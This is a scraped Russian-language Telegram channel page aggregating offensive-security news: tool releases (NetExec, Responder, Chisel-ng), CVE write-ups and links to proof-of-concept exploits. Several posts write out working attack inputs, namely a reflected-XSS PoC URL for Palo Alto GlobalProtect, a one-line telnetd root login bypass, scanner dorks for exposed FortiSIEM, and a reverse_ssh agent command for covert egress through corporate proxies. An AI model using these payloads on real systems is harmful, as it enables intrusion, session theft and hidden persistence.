Pentester's Backlog
595 subscribers
315 photos
15 videos
44 files
426 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
🚨 Вышел глобальный патч NetExec — версия 1.5!
(обновлений не было 9 месяцев)

🔗 Ссылка — скоро раскатают на pipx и kali-репозитории

Самые приятные изменения:

💠 Новый модуль для смены пароля пользователю

💠 Модуль enable_cmdshell для mssql

💠 Возможность дампа LSA/SAM через MSSQL

💠 Долгожданный фикс проблемы парсинга кириллицы в LDAP (теперь доступен глобально без необходимости устанавливать форк)

💠 Новый модуль - eventlog_creds, позволяющий искать учетки в event log'е (при наличии process creation auditing)

💠 Новый модуль Badsuccessor

💠 Теперь по умолчанию доступен коллектор Bloodhound Community Edition (сменить его обратно на legacy можно в конфиге)

💠 Новый модуль - AWS Credentials Finder

💠 Атаку Kerberoasting теперь возможно выполнять по отношению к учётным записям с включенным pre-authentication

💠 В модуль lsassy завезли поддержку дампа kerberos-билетов

💠 Возможность исполнения команд через RDP!!!!

💠 Модуль для проверки уязвимости NTLM Reflection (patch-based)

💠 Возможность kerberoasting'а определенных пользователей и компьютеров

💠 Новый модуль — raisechild для повышения привилегий в cross-forest взаимодействии

💠 Множество правок доступных раннее модулей


🥳 Бежим тестить!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4
Forwarded from Brut Security 2.0
SmuggleX v0.1.0 🚀

⚡️smugglex <TARGET> <FLAGS>

🔆 <TARGETS> | smugglex

🏷️Rust-powered HTTP Request Smuggling Scanner.

⭐️ Github: github.com/hahwul/smugglex
👍2
Forwarded from Brut Security 2.0
MongoBleed (CVE-2025-14847) - Unauthenticated Memory Leak PoC

https://github.com/joe-desimone/mongobleed

By @dez

#bugbountytips #bugbounty #cybersecurity
🔥3
С наступающим Новым Годом!

Жду эксплоит на landing под елкой в л/с канала!

🐸🐸🐸
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯21
🎄 Всем привет, с Новым Годом!

Давайте проведём небольшой интерактив в сообщениях канала — посоветуйте, пожалуйста, ноутбук по критериям: 32 GB оперативки, 1 TB SSD, нормальная поддержка виртуалок и приемлемый вес.
Из дополнительных (но не обязательных) желаний: наличие RJ45.

Самое важное: кроме MacBook
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SecuriXy.kz
🔒 CVE‑2025‑0133 - Reflected XSS в Palo Alto GlobalProtect

🌍 Затрагивает GlobalProtect Gateway, Portal и Captive Portal
⚠️ Риск:
Выполнение JS в браузере пользователя → угон сессий, кража auth‑cookie, фишинг и другие клиентские атаки.

🧩 Суть уязвимости:
Reflected XSS в обработке параметров getconfig.esp. Триггер возможен при переходе по специально сформированной ссылке.

Уязвимость затрагивает PAN‑OS 10.2 / 11.1 / 11.2 до последних патчей.
XML/SVG‑неймспейсы могут обходить стандартные HTML‑фильтры - это ключевой момент для проверки.

🛠 Что проверить инженерам:
Обработку нестандартных атрибутов, namespace‑based конструкций и вложенных тегов.
Логи обращений к /ssl-vpn/getconfig.esp и связанным endpoint’ам.
CSP, фильтрацию и поведение периметра при передаче нестандартных параметров.
Конфигурацию Captive Portal, особенно если используется для внешних пользователей.

🛡 Рекомендации администраторам: Установить обновления PAN‑OS:
◦ 11.2 → 11.2.7
◦ 11.1 → 11.1.11
◦ 10.2 → 10.2.17
Ограничить доступ к порталу (IP allowlist, GeoIP, VPN‑only access).
Включить мониторинг аномальных запросов к GlobalProtect.
Перепроверить настройки Clientless VPN, учитывая связанные риски (PAN‑SA‑2025‑0005).

PoC:

/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1–10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
1🔥1
Forwarded from 1N73LL1G3NC3
ESC17: Using ADCS to Attack HTTPS-Enabled WSUS Clients

How to leverage misconfigured ADCS templates to gain code execution on HTTPS-enabled WSUS clients.
Forwarded from cKure
■■■■■ CVE-2026-21858 + CVE-2025-68613: n8n Ni8mare - Full Chain Exploit

Unauthenticated to Root RCE:
- LFI via Content-Type confusion
- Read /proc/self/environ to find HOME
- Steal encryption key + database
- Forge admin JWT token
- Expression injection sandbox bypass
- RCE as root

CVSS 10.0

https://github.com/Chocapikk/CVE-2026-21858
Forwarded from road to OSCP
#responder #internal

[ Responder 3.2.0.0 ]

Responder 3.2.0.0 is out!
All new year updates +
- IMAP and SMTP StartTLS
- IMAPS TLS server on port 993
- DHCPv6 poisoning (pure python) using _dirkjan
mitm6 attacks
- Kerberos, DNS server updates
- Etc.

https://github.com/lgandx/Responder
Forwarded from 1N73LL1G3NC3
CVE-2025-64155: Fortinet FortiSIEM Argument Injection to Remote Code Execution.

An improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSIEM 7.4.0, FortiSIEM 7.3.0 through 7.3.4, FortiSIEM 7.1.0 through 7.1.8, FortiSIEM 7.0.0 through 7.0.4, FortiSIEM 6.7.0 through 6.7.10 may allow an unauthenticated attacker to remotely inject arguments, leading to root remote code execution.

Blog: https://horizon3.ai/attack-research/disclosures/cve-2025-64155-three-years-of-remotely-rooting-the-fortinet-fortisiem/

Dork:
ZoomEye: app="Fortinet FortiSIEM"
HUNTER : product.name="Fortinet FortiSIEM"
🔥2
Forwarded from SecuriXy.kz
🔥 Готовы впитать в себя 1.1 квадриллион NTLMv1-хэшей?

Google и Mandiant вывалили 8.6 ТБ предрасчитанных радужных таблиц - 1,122,334,455,667,788 паролей.

💀 NetNTLMv1: конец эпохи

💻 < $600 железа → < 12 часов → ключ в кармане.

🛠️Что нужно? - gsutil, DownThemAll, и много свободного места.

📦 https://console.cloud.google.com/storage/browser/net-ntlmv1-tables/tables;tab=objects?pageState=("StorageObjectListTable":("f":"%255B%255D"))&pli=1&prefix=&forceOnObjectsSortingFiltering=false
🤔2
Forwarded from PT SWARM
This media is not supported in your browser
VIEW IN TELEGRAM
📞 Microsoft fixed an authenticated RCE in Windows Telephony Service (CVE-2026-20931), discovered by our researcher Sergey Bliznyuk.

Read the write-up: https://swarm.ptsecurity.com/whos-on-the-line-exploiting-rce-in-windows-telephony-service/
Forwarded from 1N73LL1G3NC3
Chisel-ng

A Rust implementation of chisel for penetration testing and red team operations. Establishes reverse tunnels over SSH-over-WebSocket-over-TLS, allowing operators to pivot through compromised hosts while blending with normal HTTPS traffic.
😁3
Но а я снова в гонке! (♿️)
🔥2🤯2
Forwarded from Cybred
Еще даже не успели присвоить CVE

В telnetd начиная с версии 1.9.3 (май 2015 года) и вплоть до 2.7 (включительно) существует уязвимость, которая позволяет любому подключиться от имени root, без проверки пароля.

Под ударом практически все дистрибутивы Linux, которые ставят inetutils-telnetd из репозиториев:
— Debian / Ubuntu / Kali / Trisquel и производные
— Многие embedded-системы, старые роутеры, IoT-устройства, промышленные контроллеры, где до сих пор жив telnet

Shodan сейчас находит 732,350 устройств по всему миру.
А чтобы эксплуатировать, достаточно одной команды:
$ USER="-f root" telnet -a IP PORT


UPD.: присвоили https://nvd.nist.gov/vuln/detail/CVE-2026-24061
Захват аккаунта через telegram-бот: от своего номера к чужому профилю

Всего пять минут ожидания, один чужой номер телефона и обычная кнопка для получения ссылки — этого оказалось достаточно, чтобы обнаружить критическую уязвимость. Настолько минимальный сценарий неожиданно вскрыл проблему в логике обработки данных.

Читать 👉 https://blog.deteact.ru/account-takeover-thru-telegram-bot/
Forwarded from Pentester`s Notes
👋 Всем привет!

Сталкивались с ситуацией, когда в организации грамотно настроен выход в интернет?

Сценарий такой:
🔒 По умолчанию доступ в интернет с хостов запрещен.
🌐 Есть корпоративный прокси-сервер с обязательной аутентификацией.
🤔 Да ещё и только по протоколу Kerberos (Negotiate), и не каждому пользователю разрешён выход.

Итак, что делать, если вы получили доступ к хосту от имени доменного пользователя, которому разрешён выход в интернет? Мне сразу же хочется пробросить сессию наружу, запроксироваться и закрепиться тихо и надолго. 😄

💡 Поиск решения
Я перебрал много известных инструментов, но не нашёл ничего подходящего. Большинство решений поддерживают только NTLM или Basic аутентификацию, либо вообще не умеют работать с прокси.

Пришла идея написать небольшой прокси-сервер-прослойку, который бы принимал соединения без аутентификации и сам проходил её на корпоративном прокси. Но встал вопрос: откуда брать учетные данные?

🛠 Первые шаги
Нашёлся старый, но рабочий репозиторий — win-auth-proxy (ссылка). Автор реализовал извлечение дескриптора учётных данных из текущей сессии пользователя с помощью winapi функции AcquireCredentialsHandle, а затем использовал InitializeSecurityContext для аутентификации на проксе.

Скомпилировал его, почти ничего не меняя, и — о чудо, всё завелось! Но тащить два бинаря на хост показалось не очень элегантным решением.

🚀 Идеальный инструмент
Тут я вспомнил про замечательный инструмент reverse_ssh (ссылка). Он тихий и поддерживает всё, что нужно:
- Интерактивную сессию
- Проксирование
- Проброс портов
- Передачу файлов

В общем, всё, что может обычный SSH. Я форкнул репозиторий и добавил необходимые доработки для аутентификации на прокси с использованием текущих учётных данных пользователя Windows.

Отдельно стоит упомянуть гибкость транспортов. Инструмент умеет работать не только по чистому TCP, но и заворачивать трафик в HTTP, HTTPS, TLS, WS (WebSocket) и WSS. Это критически важно для обхода DPI и маскировки под легитимный веб-трафик в жестко контролируемых сетях.

Позже один молодой эксперт (nollium) доработал инструмент, добавив аутентификацию через NTLM с указанием кредов. Что удобно для запуска, например с linux систем.

💪 Финальный штрих
Я столкнулся с проблемой, когда прокси-сервер находится в одном домене AD, а пользователь — в другом. Происходила ошибка из-за неверного выбора realm. Эту проблему я тоже исправил.

Чтобы использовать фичу, достаточно добавить флаг --use-kerberos при генерации агента:
link --https --name main_agent --use-kerberos --proxy http://proxy.example.com:8080 --goos windows


Теперь у нас есть мощный инструмент, который поможет пробить стену!

PS. Все изменения уже доступны в оригинальном репозитории. Пользуйтесь на здоровье!

#pentest #redteam #proxy #kerberos #ssh #infosec #bypass #auth #negotiate
2👍1🔥1